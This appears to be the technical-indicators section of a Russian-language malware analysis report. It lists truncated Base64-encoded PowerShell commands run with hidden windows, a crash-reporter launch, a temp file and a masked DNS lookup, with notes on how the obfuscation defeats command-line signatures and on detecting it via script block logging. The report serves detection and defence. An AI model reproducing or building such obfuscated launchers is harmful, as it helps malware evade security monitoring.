Техническая информация
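- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AHAAYAB3AGkAYABKAE8AdwB9AD0AWwB3AG0AaQBjAGwAYQBzAHMAXQAoACIAewAxAH0AewAzAH0AewA0AH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAHAAJwAsACcAVwBpAG4AMwAnACwAJwByAHQAdQAnACwAJwAyACcALAAnAF8AUAByAG8AYwBlAH...
  Примечание: параметр -e — сокращение от -EncodedCommand; аргумент — команда PowerShell, закодированная в Base64 поверх UTF-16LE (в отчёте обрезана многоточием). Видимая часть декодируется в приведение к [wmiclass], где имя класса собирается оператором форматирования -f из фрагментов 'Win3', '2', '_Proce…', 'rtu', 'p' — предположительно Win32_ProcessStartup. Имя класса не встречается в строке целиком, поэтому поиск по открытому тексту командной строки его не обнаружит.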
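- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1532
  Примечание: DW20.EXE — штатный компонент отчётов об ошибках приложений Microsoft (Dr. Watson); его запуск, вероятно, говорит об аварийном завершении приложения, в котором был открыт исходный объект.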
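- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAuACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAFMAJwAsACcAZQB0ACcAKQAgACAAKAAnAHYAZgAnACsAJwBIAFoAZQAnACsAJwB5ACcAKQAgACgAIAAgAFsAdAB5AFAARQBdACgAIgB7ADcAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADAAfQB7ADUAfQB7AD...
  Примечание: параметр -e — сокращение от -EncodedCommand; аргумент — команда PowerShell в Base64 поверх UTF-16LE (в отчёте обрезана). В видимой части имя вызываемой команды и её аргументы собраны из фрагментов конкатенацией строк и оператором -f, а имя типа в [tyPE] записано в смешанном регистре. Для анализа и обнаружения надёжнее опираться на журнал блоков сценариев PowerShell (Script Block Logging, событие 4104), где сохраняется уже декодированный текст, чем на сигнатуры по командной строке.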
- %TEMP%\1154032.cvr
- DNS-запрос (DNS ASK): st####hthoods.com (часть доменного имени в отчёте заменена символами #)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AHAAYAB3AGkAYABKAE8AdwB9AD0AWwB3AG0AaQBjAGwAYQBzAHMAXQAoACIAewAxAH0AewAzAH0AewA0AH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAHAAJwAsACcAVwBpAG4AMwAnACwAJwByAHQAdQAnACwAJwAyACcALAAnAF8AUAByAG8AYwBlAH...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAuACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAFMAJwAsACcAZQB0ACcAKQAgACAAKAAnAHYAZgAnACsAJwBIAFoAZQAnACsAJwB5ACcAKQAgACgAIAAgAFsAdAB5AFAARQBdACgAIgB7ADcAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADAAfQB7ADUAfQB7AD...' (со скрытым окном)